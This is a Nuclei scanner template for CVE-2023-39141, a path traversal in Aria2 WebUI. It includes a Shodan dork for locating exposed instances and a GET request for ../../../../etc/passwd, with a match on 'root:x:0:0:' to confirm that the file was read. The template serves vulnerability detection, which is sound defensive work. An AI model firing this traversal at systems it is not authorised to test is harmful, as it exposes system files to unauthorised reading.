nuclei-templates/http/cves/2023/CVE-2023-39141.yaml

31 lines
843 B
YAML

id: CVE-2023-39141
info:
name: Aria2 WebUI - Path traversal
author: DhiyaneshDk
severity: high
description: |
webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.
reference:
- https://twitter.com/win3zz/status/1694239332465520684
- https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e
- https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10
metadata:
max-request: 2
shodan-dork: title:"Aria2 WebUI"
verified: true
tags: lfi,unauth,aria2,webui
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/../../../../etc/passwd"
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Aria2 WebUI")'
- 'regex("root:x:0:0:",body_2)'
condition: and